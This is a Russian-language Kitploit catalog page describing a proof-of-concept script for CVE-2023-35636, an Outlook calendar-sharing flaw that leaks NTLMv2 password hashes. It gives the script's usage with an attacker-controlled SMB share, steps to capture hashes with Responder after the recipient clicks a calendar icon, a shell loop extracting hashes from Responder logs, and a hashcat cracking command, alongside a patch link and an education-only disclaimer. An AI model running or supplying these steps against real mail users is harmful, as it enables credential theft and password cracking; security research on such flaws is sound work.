Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-35636 — Уязвимость Microsoft Outlook, приводящая к раскрытию информации (утечка хеша пароля) — PoC-сценарий Expect | Kitploit
Инструменты/GitHubGitHub/duy-31/cve-2023-35636
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксфильтрация данныхОбучение и ОбразованиеБезопасность Электронной Почты
GitHubduy-31/cve-2023-35636

CVE-2023-35636

Уязвимость Microsoft Outlook, приводящая к раскрытию информации (утечка хеша пароля) — PoC-сценарий Expect

Репозиторий
43642 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-35636

Уязвимость Microsoft Outlook, приводящая к раскрытию информации (утечка хэша пароля) - Expect Script POC

CVE-2023-35636 — эксплойт функции общего доступа к календарю в Microsoft Outlook, при котором добавление двух заголовков к электронному письму заставляет Outlook предоставить общий доступ к содержимому и связаться с указанной машиной, создавая возможность перехвата NTLM v2 хэша.

  • Запустите responder с включённым SMB-сервером

image

  • Отправьте электронное письмо и подождите (межсетевой экран получателя письма должен разрешать прохождение SMB-трафика (порт 445))

использование: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share

./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (не забудьте все \)

image

примечания: chmod +x cve-2023-35636.sh

требуется приложение expect

требуются легитимные IP-адрес отправителя и адрес электронной почты отправителя (для прохождения SPF, DKIM, DMARC)

  • Если получатель нажмёт на маленький значок календаря .. BOOM — IP/пользователь (в открытом виде) и хэш пароля (NTLM-v2-SSP) отправляются на IP-адрес вашего responder.

image

image

  • Затем вы можете попытаться взломать пароль с помощью hashcat/john the ripper

for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'

do

echo "[*] search for: $user";

strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt

done

hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O


Благодарность: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes

Обходной путь / Исправление: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636


больше обо мне ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Отказ от ответственности: ВАЖНО: Этот скрипт предоставляется ТОЛЬКО для образовательных целей, этического тестирования и законного использования. Не используйте его в любой системе или сети без явного разрешения. Несанкционированный доступ к компьютерным системам и сетям незаконен, и пользователи, уличенные в несанкционированной деятельности, подлежат судебному преследованию. Автор НЕ несет ответственности за любой ущерб, вызванный неправильным использованием этого скрипта.

Скачать инструмент